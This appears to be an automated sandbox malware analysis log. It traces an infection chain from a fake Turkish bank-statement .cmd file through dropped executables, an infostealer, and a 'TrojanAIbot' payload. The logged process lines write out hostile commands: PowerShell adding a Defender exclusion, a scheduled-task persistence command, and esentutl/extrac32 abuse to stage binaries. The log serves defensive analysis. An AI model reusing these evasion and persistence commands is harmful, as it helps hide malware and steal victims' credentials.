Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Code function: 27_2_064266E8	27_2_064266E8
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Code function: 27_2_064256B8	27_2_064256B8
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Code function: 27_2_0642C2A0	27_2_0642C2A0
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Code function: 27_2_0642B32A	27_2_0642B32A
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Code function: 27_2_06423178	27_2_06423178
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Code function: 27_2_06427798	27_2_06427798
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Code function: 27_2_0642E4C0	27_2_0642E4C0
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Code function: 27_2_06425DDF	27_2_06425DDF
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Code function: 27_2_06422350	27_2_06422350
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Code function: 27_2_06420040	27_2_06420040
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Code function: 27_2_06420025	27_2_06420025
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Code function: 29_2_02C320C4	29_2_02C320C4

Source: Joe Sandbox View

Dropped File: C:\Users\Public\Libraries\lxsyrsiW.pif 7BCDC2E607ABC65EF93AFD009C3048970D9E8D1C2A18FC571562396B13EBB301

Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Code function: String function: 02CA4860 appears 683 times
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Code function: String function: 02C346D4 appears 155 times
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Code function: String function: 02CA46D4 appears 155 times
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Code function: String function: 02C34860 appears 683 times
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Code function: String function: 02C4894C appears 50 times
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Code function: String function: 02CB894C appears 50 times
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: String function: 02D944DC appears 74 times
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: String function: 02DA894C appears 56 times
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: String function: 02DA89D0 appears 45 times
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: String function: 02D946D4 appears 244 times
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: String function: 02D94860 appears 949 times
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: String function: 02D94500 appears 33 times

Source: 12.0.neworigin.exe.6d0000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe, type: DROPPED	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers

Source: armsvc.exe.11.dr

Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Source: armsvc.exe.11.dr

Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Source: neworigin.exe.11.dr, cPs8D.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: neworigin.exe.11.dr, 72CF8egH.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: neworigin.exe.11.dr, G5CXsdn.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: neworigin.exe.11.dr, 3uPsILA6U.cs	Cryptographic APIs: 'CreateDecryptor'
Source: neworigin.exe.11.dr, 6oQOw74dfIt.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: neworigin.exe.11.dr, aMIWm.cs	Cryptographic APIs: 'CreateDecryptor', 'TransformBlock'
Source: neworigin.exe.11.dr, 3QjbQ514BDx.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: neworigin.exe.11.dr, 3QjbQ514BDx.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: classification engine

Classification label: mal100.spre.troj.spyw.evad.winCMD@54/27@5/3

Source: C:\Users\user\AppData\Local\Temp\x.exe

Code function: 4_2_02D97FD2 GetDiskFreeSpaceA,

4_2_02D97FD2

Source: C:\Users\user\AppData\Local\Temp\x.exe

Code function: 4_2_02DA6DC8 CoCreateInstance,

4_2_02DA6DC8

Source: C:\Users\user\AppData\Local\Temp\x.exe

File created: C:\Users\Public\Libraries\PNO

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6584:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6104:120:WilError_03
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Mutant created: NULL
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Mutant created: \Sessions\1\BaseNamedObjects\kbedaSzAAOYDRDgN
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	Mutant created: \Sessions\1\BaseNamedObjects\Global\Multiarch.m0yv-e5c7a92cab22d576-inf
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7164:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1868:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6552:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5768:120:WilError_03
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	Mutant created: \Sessions\1\BaseNamedObjects\Global\Multiarch.m0yv-e5c7a92cab22d57673779169-b

Source: C:\Windows\System32\extrac32.exe

File created: C:\Users\user\AppData\Local\Temp\CAB06052.TMP

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\x.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales

Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Users\Public\Libraries\lxsyrsiW.pif

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Windows\System32\extrac32.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\Public\Libraries\lxsyrsiW.pif

Evasive API call chain: __getmainargs,DecisionNodes,exit

graph_11-188

Source: unknown	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\TC_Ziraat_Bankasi_Hesap_Ekstresi.cmd" "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\extrac32.exe extrac32 /y "C:\Users\user\Desktop\TC_Ziraat_Bankasi_Hesap_Ekstresi.cmd" "C:\Users\user\AppData\Local\Temp\x.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe"
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\lxsyrsiW.cmd" "
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\ping.exe /d C:\\Users\\Public\\xpha.pif /o
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl.exe /y C:\Users\user\AppData\Local\Temp\x.exe /d C:\\Users\\Public\\Libraries\\Wisrysxl.PIF /o
Source: C:\Windows\SysWOW64\esentutl.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process created: C:\Users\Public\Libraries\lxsyrsiW.pif C:\Users\Public\Libraries\lxsyrsiW.pif
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	Process created: C:\Users\user\AppData\Local\Temp\neworigin.exe "C:\Users\user\AppData\Local\Temp\neworigin.exe"
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	Process created: C:\Users\user\AppData\Local\Temp\server_BTC.exe "C:\Users\user\AppData\Local\Temp\server_BTC.exe"
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi'
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" /st 09:33 /du 23:59 /sc daily /ri 1 /f
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process created: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe"
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpD0BF.tmp.cmd""
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout 6
Source: unknown	Process created: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: unknown	Process created: C:\Users\Public\Libraries\Wisrysxl.PIF "C:\Users\Public\Libraries\Wisrysxl.PIF"
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Process created: C:\Users\Public\Libraries\lxsyrsiW.pif C:\Users\Public\Libraries\lxsyrsiW.pif
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	Process created: C:\Users\user\AppData\Local\Temp\neworigin.exe "C:\Users\user\AppData\Local\Temp\neworigin.exe"
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	Process created: C:\Users\user\AppData\Local\Temp\server_BTC.exe "C:\Users\user\AppData\Local\Temp\server_BTC.exe"
Source: unknown	Process created: C:\Users\Public\Libraries\Wisrysxl.PIF "C:\Users\Public\Libraries\Wisrysxl.PIF"
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Process created: C:\Users\Public\Libraries\lxsyrsiW.pif C:\Users\Public\Libraries\lxsyrsiW.pif
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	Process created: C:\Users\user\AppData\Local\Temp\neworigin.exe "C:\Users\user\AppData\Local\Temp\neworigin.exe"
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	Process created: C:\Users\user\AppData\Local\Temp\server_BTC.exe "C:\Users\user\AppData\Local\Temp\server_BTC.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\extrac32.exe extrac32 /y "C:\Users\user\Desktop\TC_Ziraat_Bankasi_Hesap_Ekstresi.cmd" "C:\Users\user\AppData\Local\Temp\x.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\lxsyrsiW.cmd" "	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl.exe /y C:\Users\user\AppData\Local\Temp\x.exe /d C:\\Users\\Public\\Libraries\\Wisrysxl.PIF /o	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process created: C:\Users\Public\Libraries\lxsyrsiW.pif C:\Users\Public\Libraries\lxsyrsiW.pif	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\ping.exe /d C:\\Users\\Public\\xpha.pif /o	Jump to behavior
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	Process created: C:\Users\user\AppData\Local\Temp\neworigin.exe "C:\Users\user\AppData\Local\Temp\neworigin.exe"	Jump to behavior
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	Process created: C:\Users\user\AppData\Local\Temp\server_BTC.exe "C:\Users\user\AppData\Local\Temp\server_BTC.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi'
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" /st 09:33 /du 23:59 /sc daily /ri 1 /f
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process created: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe"
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpD0BF.tmp.cmd""
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout 6
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Process created: C:\Users\Public\Libraries\lxsyrsiW.pif C:\Users\Public\Libraries\lxsyrsiW.pif
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	Process created: C:\Users\user\AppData\Local\Temp\neworigin.exe "C:\Users\user\AppData\Local\Temp\neworigin.exe"
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	Process created: C:\Users\user\AppData\Local\Temp\server_BTC.exe "C:\Users\user\AppData\Local\Temp\server_BTC.exe"
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Process created: C:\Users\Public\Libraries\lxsyrsiW.pif C:\Users\Public\Libraries\lxsyrsiW.pif
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	Process created: C:\Users\user\AppData\Local\Temp\neworigin.exe "C:\Users\user\AppData\Local\Temp\neworigin.exe"
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	Process created: C:\Users\user\AppData\Local\Temp\server_BTC.exe "C:\Users\user\AppData\Local\Temp\server_BTC.exe"

Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: url.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??????p.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
